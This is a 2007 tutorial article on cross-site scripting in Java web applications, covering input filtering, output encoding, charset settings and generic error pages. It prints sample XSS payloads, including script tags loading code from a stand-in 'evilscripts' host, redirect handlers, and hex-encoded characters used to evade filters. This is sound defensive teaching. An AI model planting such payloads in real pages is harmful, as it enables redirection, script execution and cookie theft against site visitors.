T L Anews.com

Information for Security Concerned People

TLAnews
Search
 
 

TLAflash Registration
 
Tech Doc
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Cross Site Scripting Java Input Validation

16.09.2007

This is the second article in a series on handling Java web application input. In part one, I talked about validation best practices and SQL injection attacks. In this article, I will continue the theme, and in particular will talk about the threat of cross-site scripting, as well as looking at correctly handling exceptions in J2EE web applications.

Cross-Site Scripting

Cross-site scripting, also known as XSS, is an attack against dynamic applications. It occurs when an application ignorantly accepts input containing units of instruction from an external source. This input is then sent as part of the response to a delivery medium such as a web browser, and may also be persisted to a data store for future display. The success of such an attack is heavily dependent on a web browser's facility to discern regular content from instruction: markup and data. Let us consider a simple example, shown in Figure 1, that allows the posting of movie reviews.



 

Figure 1 shows a web page that allows a user to post a movie review. Let us consider what would happen if a movie review was posted containing some JavaScript code:


  <script> alert("Hello Script Injection"); </script> 

The possible result of this is shown in Figure 2.

 

 

Figure 2. Script injection attack

As you can see, this input results in the JavaScript scriptlet being executed anytime a user requests the web page. In this case, it displays a harmless alert window. An attacker initiates this attack by interacting with the application, passing data through HTML form input fields. This data is then sent to the web server via a HTTP post request. On receipt, the web server passes this request to the J2EE web container, which in turn parses the HTTP request to extract pertinent data: HTTP headers, request data, referrer URL, etc. This data is then used to construct a javax.servlet.http.HttpServletRequest that provides a programmer-friendly interface to this data. This object is then used to retrieve the movie data, performing simple validation to ensure required data has been set.

The problem with this approach is that the validation employed does not protect against an XSS attack. This is due to the fact that input data contains characters that are considered special under the HTML specification. The HTML 4.0 specification includes around 250 special characters. However, in relation to a XSS attack, commonly used characters include <, >, &, {, }, [, ], and %. An attacker can use these characters and others to construct a series of attack strings that the receiving web browser will interpret as units of instruction and execute accordingly.

Now consider the following tag:


  <script type="text/javascript" src="http://evilscripts/js/evilScript.js" />

This results in the malicious script evilScript.js being downloaded and executed. A similar attack looks like this:


  <script type="text/javascript">     
    location.href="http://evilscripts/js/evilScriptPage.html";
  </script>

The result of this would be the user being redirected to evilScriptPage.html on every load of the page.

An anchor can hide a script, too:


  <A HREF="http://evilscripts.com/evilScriptPage.html?script=
  <SCRIPT SRC='http://evilscripts/js/evilScript.js'></SCRIPT>">
  Go to Movies web site</A> 

This is a link that sends a user to http://evilscripts.com/evilScriptPage.html and executes the evilScript.js script.

There are also "inline" script attacks, which work in newer browsers.


  <body onload="javascript:alert('Hello Inline Script Attack');">

Finally, there are attacks that launch when the user mouses over them:


  <img
    onmouseover="location.href='http://evilscripts/js/evilScriptPage.html';" 
    src="images/example.gif" id="example"
    width="482" height="297" alt="example" />

This is an image that redirects a user to http://evilscripts/js/evilScriptPage.html when the mouse is placed over the image.

Tags that Allow for Cross-Site Scripting

Common exploits include the use of <script>, <applet>, <object>, <embed>, and standard HTML tags.

Tag Description
<APPLET> Used to embed a Java applet in a document. This tag is deprecated in HTML 4.0 in favor of the object tag.
Attributes:
  • code: URL that points to the class of the applet.
  • codebase: Indicates the base URL of the applet if the code attribute is relative.
  • name: Defines a unique name for the applet (to use in scripts).
  • object: Defines the name of the resource that contains a serialized representation of the applet.
<EMBED> Adds an object to a document. Commonly used to add multimedia (an applet, ActiveX control, or Flash or sound files) to your HTML page.
Attributes:
  • autostart: Indicates if the sound track should start automatically upon loading.
  • code: Specifies the class name of the Java code to be executed (IE only).
  • codebase: Specifies the base URL for the application (IE only).
  • data:Defines a URL that refers to the object's data.
  • endtime: Indicates the spot on the sound track where to stop playing.
  • hidden: Hides the media file or player from view when set to true.
  • name: Specifies the name for the object for later use by a script.
  • pluginspage: Specifies the location of the plugin software needed to run the sound file. This attribute is needed only if the plugin software is not one of the common ones that are already installed on the computer. Supported only by Netscape Navigator.
  • pluginURL: Specifies the location of the software needed to install the specified plugin (JAR Installation Manager). This attribute is needed only if the plugin software is not one of the common ones already installed on the computer. Supported only by Netscape Navigator.
  • name: Specifies the name of the object to be referenced by scripts on the page.
  • playcount: Specifies the number of times to play the sound (IE only).
  • starttime: Indicates the spot on the track where to begin playing.
  • type: Defines the MIME type of data specified in the data attribute.
<OBJECT> Defines an embedded object. Use this element to add multimedia (an applet, ActiveX control, etc.) to your HTML page. This element allows you to specify the data and parameters for objects inserted into HTML documents, and the code that can be used to display/manipulate that data.
Attributes:
  • archive: A space-separated list of URLs to archive. The archive contains resources relevant to the object.
  • classid: Defines a class ID value as set in the Windows Registry or a URL.
  • codebase: Defines where to find the code for the object.
  • codetype: The internet media type of the code referred to by the classid attribute.
  • data: Defines a URL that refers to the object's data.
  • name: Specifies the name of the object to be referenced by scripts on the page.
  • type: Defines the MIME type of data specified in the data attribute.
<SCRIPT> Defines an executable script, such as JavaScript or VBScript.
Code within this element is executed immediately when a page is loaded, if it is not in a function or due to the execution of an event.
Attributes:
  • type: Replaces the language attribute as of HTML 4.0. Specifies the language of the script. Value must be a valid MIME type.
    Possible values: text/ecmascript, text/javascript, text/jscript, text/vbscript, text/vbs, text/xml.
  • src: Defines a URL to a file that contains the script (instead of inserting the script into your HTML document, you can refer to a file that contains the script).
  • charset: Defines the character encoding used in the script.
Example: <script type="text/javascript">document.write("Hello JavaScript!") </script>
Output: Writes "Hello JavaScript!" to the web page.

A script injection attack does not necessarily have to be initiated with malicious intent. For example, a well-meaning user could enter standard HTML markup and alter page formatting, seriously defacing the look of a website.

Threats Of Cross-Site Scripting

The exploits achieved through script injection vary across a large spectrum. This is due to the nature of the attack: any website that provides a facility for an attacker to insert instructions into a web page opens an application up to a variety of attacks, causing serious ramifications. An exploit is heavily dependent on the environment in which the malicious code executes, such as the privileges granted under the account that the application runs and the program language used. Some common exploits achieved through cross-site scripting include:

  • The attacker can steal cookies, inserting a script into a web page of a vulnerable website. This script collects user cookies and then sends them to the attacker. The attacker can then impersonate a user (which is particularly dangerous in a single-sign-in environment), possibly gaining access to sensitive data such as credit card numbers and passwords.
  • The attacker can insert a malicious link into a popular website, usually encoding it to make it difficult to discern from a well-meaning link; when a user clicks on the link, a malicious script is executed. A link could also be used to redirect a user to a malicious web page that takes on the appearance of a trusted site, possibly requesting security credentials.
  • User input may be intercepted. An attacker could write a script that monitors user input and sends sensitive data back to the attacker.
  • An attacker can trick the web server into executing malicious code in the same context as trusted code. This can give the attacker access to the web server and possibly, network access.
  • An attacker can deface a website, rendering it unreadable or adding any content they see fit.
  • An attacker can use the application logger to inject malicious input into the application. This input can be executed if logs are viewed in HTML form. Therefore, a good security practice is to wrap the application logger using a custom implementation that filters malicious input.

Preventing Cross-Site Scripting

One approach to achieving prevention is to configure the web browser to disable scripting. Unfortunately, this is not always a viable option as it affects functionality and, worse, relies on autonomous configuration. Therefore we need to plug in some validation code. However, before banging out any code, it is important to understand that an attacker will take measures to evade any validation code, testing for the possibility of dangerous special characters. This will normally be carried out by using numeric character references such as hexadecimal and decimal, or character entity references of special characters for a particular character encoding, like the following:

Char < > " : { } [ ] ;
Hex Char Code %3c %3e %22 %3a %7b %7d %5b %5d %3b

In order to be able detect special characters, it is vital that the web server explicitly set the character set of any web page. If the character set is not explicitly set in the HTML output, an attacker can set a different character set. An attacker can then pass malicious content containing special characters in a different encoding, which the validation code cannot recognize, rendering it obsolete. The character set of a web page can be set by specifying the meta tag in the head section of an HTML page:


  <HEAD>
        <META http-equiv="Content-Type"
        content="text/html; charset=ISO-8859-1">
  </HEAD>

The above declaration sets the character set to the Latin character set necessary for typing Western European languages. It is therefore important, when writing validation code, to be aware of what character set is being used in order to correctly recognize special characters.

Once this is set, the next step is to craft some validation code. When writing this code, it is critical to understand that every application is different (different internationalization requirements, etc.) and secure coding practices that protect one application may not protect another. Therefore, before writing any code, it is important to play the role of the attacker, looking for any entry points from which data is input from an unknown source. One these points have being identified, it is important to construct attack strings in order to understand how your application can be exploited. When it comes to writing some validation code there are two main choices: filtering and encoding.

Filtering

The safest and perhaps most performant method of preventing against attack is to only accept data that is deemed valid and reject everything else, possibly returning an error to the client. For example, if the input data is expected to be numeric, then ensure that this is the case by rejecting any input that is not.


  final String inputStr = request.getParameter("input");
  final String numericPattern = "^\\d+$";
  if (!inputStr.matches(numericPattern))
  {
        /* invalid input, do something with error*/
  }

Although this is the best form of prevention and would work well for the movie review example, it may not be practical to reject all data. In this case, a cleaning routine can be used, which checks for the existence of special characters and replaces each with another character, such as a space.


  /* regular expression that 
   * tests for the existence of malicious characters 
   * and replaces them with a space. */
        
  final String filterPattern="[<>{}\\[\\];\\&]";
  String inputStr = s.replaceAll(filterPattern," ");
 

Encoding

In certain situations, it is not viable to reject certain input. For example, consider an online forum that allows programmers to post code. If code is filtered, it will not display correctly, making messages difficult to understand. In this case, we cannot apply filtering and need an alternative approach.

One such approach is to encode the data. Encoding transforms harmful characters into their display equivalents by using character entity references or numeric character references. For example, < and > will be transformed into &lt and &gt; respectively. However, when applying this approach, it is important to set the character set of the response, as shown earlier. This is needed due to the way in which the web server and the web browser interact when sending data over the wire. When a web server needs to send characters to a browser, it needs to convert them into a series of bytes. When the browser receives these bytes, it needs to convert them back into a stream of characters. The Charset header specifies how this conversion is done. Likewise, when you write dynamic content using a JSP or in a servlet using response.getWriter(), the web container converts strings into bytes using the specified character set. When encoding is used, the character references generated by the encoding routine are sent over the wire as special byte sequences regulated by the particular character set. If the character set is not set, when the web browser receives the stream of bytes, it may use a different character set to transform the data into a character stream. This makes it possible that during the transformation process, encoded characters may be transformed into special characters. The different character sets use different byte sequences to represent characters, and this destroys your encoding efforts.

This code is a simple routine that encodes any input passed to it for display in a web browser into its equivalent form, using decimal character references:


  public static String encode(String data)
  {
        final StringBuffer buf = new StringBuffer();
        final char[] chars = data.toCharArray();
        for (int i = 0; i < chars.length; i++) 
        { 
                buf.append("&#" + (int) chars[i]);
        }     

        return buf.toString();
  }


For example, passing:


    <script> alert("Hello Script Injection"); </script> 

Is transformed into:


        &#60&#115&#99&#114&#105&#112&#116
        &#62&#32&#97&#108&#101&#114&#116
        &#40&#34&#72&#101&#108&#108&#111
        &#32&#83&#99&#114&#105&#112&#116
        &#32&#73&#110&#106&#101&#99&#116
        &#105&#111&#110&#34&#41&#59&#32
        &#60&#47&#115&#99&#114&#105&#112
        &#116&#62

This enables the browser to treat it as a harmless string and not as executable content. The JSP Standard Tag Library (JSTL) provides similar functionality, by providing the standard out tag, which encodes various HTML special characters using character entity references. An important consideration when using encoding is that it can incur a performance penalty. Furthermore, as stated earlier, an attacker may enter a different representation of special characters when sending the data to the server (such as using a hexadecimal representation). As a result, data should be decoded before encoding it.


  public static String decodeHex(final String data,
                                 final String charEncoding) 
  {
    if (data == null) 
    {
        return null;    
    }
    byte[] inBytes = null;  
    try 
    { 
        inBytes = data.getBytes(charEncoding); 
    } 
    catch (UnsupportedEncodingException e) 
    { 
        //use default charset
        inBytes = data.getBytes(); 
    } 
    
    byte[] outBytes = new byte[inBytes.length]; 

    int b1;
    int b2;
    int j=0;
    for (int i = 0; i < inBytes.length; i++) 
    { 
        if (inBytes[i] == '%') 
        { 
            b1 = Character.digit((char) inBytes[++i], 16); 
            b2 = Character.digit((char) inBytes[++i], 16); 

            outBytes[j++] = (byte) (((b1 & 0xf) << 4) + 
                    (b2 & 0xf)); 
        } 
        else 
        { 
            outBytes[j++] = inBytes[i]; 
        } 
    } 
    
    String encodedStr = null;
    try 
    { 
        encodedStr = new String(outBytes, 0, j, charEncoding); 
    } 
    catch (UnsupportedEncodingException e) 
    { 
        encodedStr = new String(outBytes, 0, j); 
    } 

    return encodedStr; 
  }


The above code is used to decode any hexadecimal-encoded characters. It accepts a string containing the data to decode, along with the character set to decode the data to (such as UTF-8, 8859_1, etc).

An important decision is where to apply the validation techniques. The two main places where this is commonly done are on receipt of the request or when writing the response. It is generally a good idea to apply both, and the decision to do so will depend on the specific requirements of the application. Any input data should be validated on receipt, ensuring that it is of the required type whenever possible. Encoding should be performed when writing the response. A good practice for doing this in a JSP page is to use a custom tag. This is due to the fact that data does not necessarily have to be input via the web application. Data can be input into an application via a number of different methods: through logging, entered directly into a database, etc.

Error Reporting

During the process of conducting an attack, an attacker will usually pass some input that will result in a web server returning an error. A poorly designed error-handling infrastructure will allow an attacker to learn more about the system they are trying to exploit. An attacker can use this newfound knowledge to trigger a stronger attack the next time around. Therefore, it is critical to limit the information returned.

A best practice for handling this kind of situation is to return a generic error message to the client and log the error, including any resultant exceptions and the corresponding stack traces, to the application log file, possibly emailing a system administrator if persistent error conditions occur. A J2EE-compliant web container provides a nice fit for this scenario, using declarative error handling through the error-page element of the application deployment descriptor web.xml. The error-page element allows you to map HTTP response codes (such as 500 Internal Server Error and 404 Not Found), as well as thrown exceptions, to a specific error-handling page:


  <!-- Maps the 404 Not Found response code
    to the error page /errPage404 -->
  
  <error-page>
      <error-code>404</error-code>
      <location>/errPage404</location>
  </error-page>
  
   <!-- Maps any thrown ServletExceptions
    to the error page /errPageServ -->
   <error-page>
      <exception-type>javax.servlet.ServletException</exception-type>
      <location>/errPageServ</location>
  </error-page>
  
   <!-- Maps any other thrown exceptions
   to a generic error page /errPageGeneric -->
  <error-page>
      <exception-type>java.lang.Throwable</exception-type>
      <location>/errPageGeneric</location>
  </error-page>


The <location> element is used to specify the resource (servlet, JSP, etc.) that will handle an error when thrown, the <error-code> element specifies the error code to be handled, and the <exception-type> element specifies the exception to be handled. For instance, in the above example, any error that is sent with the error code 404 will be intercepted by the web container and forwarded to the resource located at /errPage404. Likewise, any exception that is thrown that is not an instance of javax.servlet.ServletException will be also forwarded. The exception and error code can be retrieved by a servlet handling the error using:


  Throwable throwable = (Throwable)
  request.getAttribute("javax.servlet.error.exception");
        

  String status_code = ((Integer)
  request.getAttribute(
    "javax.servlet.error.status_code")).toString( );

The error details can then be logged to a log file, and a generic error message can be returned to the client that contains no specific error details or stack traces that would aid an attacker.

Conclusion

In this series, we looked at the importance of handling application input correctly. In particular, we looked at validation best practices as well as the threats of SQL injection and cross-site scripting. It is hoped that these articles have provided a good starting point for J2EE developers, helping to understand and appreciate the seriousness of the very real and dangerous threat posed by inadequate data validation. The appearance of automated tools and the incorporation of new features into the various specifications and web browsers has resulted in attackers finding new and innovative ways to exploit an application through application input. An attacker can initiate an attack through a web browser by constructing attack strings, sending them via a HTTP get request through URL tampering, via a HTTP post request through HTML forms, or by other means. It is therefore critical that any possibility for data being input into an application from an external source is carefully analyzed, and secure coding practices put in place to meet the specific validation needs of an application in order to neutralize any threats.

Resources

 

 

 

Related information


Back to Latest News

 

Author information.
Copyright © [Telecom and Logistics Associates Sàrl]. All rights reserved.
Revised: septembre 15, 2007 .

All information provided is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the facts of the particular situation.

 Publications
  
 Christian ALT  
      
Telecom and Logistics Associates est spécialisé en sécurité informatique. Intervient auprès de ses clients comme auditeurs ou pour la préparation à la certification ISO 27001 de la sécurité des systèmes d'information.

 

 

 

 
   
Translate this page from:
 
 
Résumé en français